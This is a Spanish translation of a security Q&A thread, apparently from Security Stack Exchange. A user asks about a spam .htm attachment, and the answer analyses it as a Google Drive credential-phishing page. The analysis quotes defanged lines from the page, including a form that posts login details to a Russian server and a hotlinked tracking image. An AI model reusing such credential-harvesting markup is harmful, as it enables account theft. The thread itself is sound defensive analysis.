¿Recibió un correo no deseado con un archivo adjunto htm, es dañino el script?

Navega tus respuestas
8

Hoy recibí un correo electrónico con un adjunto htm, el mth contiene el siguiente código: 

<html>  
    <head>
        <script>
            var url = ""
            window.location.href= url;
        </script>
    </head>
</html>

A la variable url se le asignó un gran valor de 247251 caracteres, creo que son caracteres un poco de basura solo para aumentar la longitud de la URL.

Intencionalmente no escribí el contenido de la URL solo para evitar que no esté exponiendo ninguna amenaza de seguridad a otros. Aquí está el pastebin de la basura a la que me refiero .

Si abro esto en cualquier navegador web, ¿qué daño puede hacer?

    
pregunta Kaushalendra Mishra 19.12.2015 - 02:54
fuente

1 respuesta

13

¿Qué es?

Descifre tu "basura" Esta es la codificación base64, y es demasiado grande para colocarla aquí. Aquí está el resultado decodificado: enlace

Esto parece ser un archivo adjunto de la página de inicio de sesión de Google Drive. De hecho, todo se saca de Google Drive, con la excepción de algunos elementos.

Este es un intento de phishing.

Como puede ver en el número de línea 2642 , en realidad está intentando enviar los datos a un servidor web en Rusia: 

<form action="hxxp://www.gladiolusfashion.ru/js/fancybox/country.php" id="signup" method="post" name="signup">

Básicamente, solo se trata de robar los detalles de tu cuenta de Google. Este es un intento de suplantación de identidad (phishing).

Sin embargo, hay otro problema potencial: una imagen enlazada en caliente desde el Reino Unido: 

Confirm your identity.<img align="right" border="0" height="33" src="hxxp://www.bountifulbreast.co.uk/images/100Secure.jpg" width="83"></h1>

Lo que probablemente haga es alertar al propietario de ese sitio web de que se intentó acceder a esa imagen en particular. Si los propietarios de esos sitios web son los mismos, entonces se podrían registrar su dirección IP y el intento de acceso. Esto podría ayudarles a determinar la efectividad de sus ataques de phishing. "¿Cuántas personas ven esto en comparación con cuántas caen por ello?"

También es posible que el servidor web para las imágenes también esté comprometido. Puede estar comprometido o simplemente enlazado. Es difícil decirlo.

En la parte superior, para evitar alertar sobre la detección de suplantación de identidad de Google, los phishers no tuvieron más remedio que enlazar a un sitio web gratuito de íconos para darle una apariencia de legitimidad. Puedes ver esto en las líneas 2585 y 2586 : 

<link rel="shortcut icon" href="hxxp://icons.iconarchive.com/icons/marcus-roberto/google-play/512/Google-Drive-icon.png">
<link rel="apple-touch-icon" href="hxxp://icons.iconarchive.com/icons/marcus-roberto/google-play/512/Google-Drive-icon.png">

Finalmente, cuando envía datos, lo envía a una página falsa que dice que el archivo solicitado no existe. (pastebin)

TL; Desglose de DR

Este intento de phishing está intentando hacer algunas cosas:

  1. Al abrir el archivo adjunto, intentará redirigirlo a una página con un inicio de sesión falso en Google Drive e intentar engañarlo para que ingrese sus credenciales.
  2. Si fue lo suficientemente tonto como para ingresar sus credenciales, se enviarán a un script php ubicado en un servidor en Rusia.
  3. Una vez enviado, recibirá una página de inicio de sesión falsa (pegada de esto) que le dice que el archivo no existe. li>

Conclusión

No te molestes en abrirlo. Está intentando que ingreses tus credenciales.

    
respondido por el Mark Buffalo 19.12.2015 - 04:52
fuente

Lea otras preguntas en las etiquetas

¿La Política de seguridad de contenido solo se aplica durante el procesamiento inicial? ¿Por qué se requiere un certificado de CA para los clientes EAP-TLS?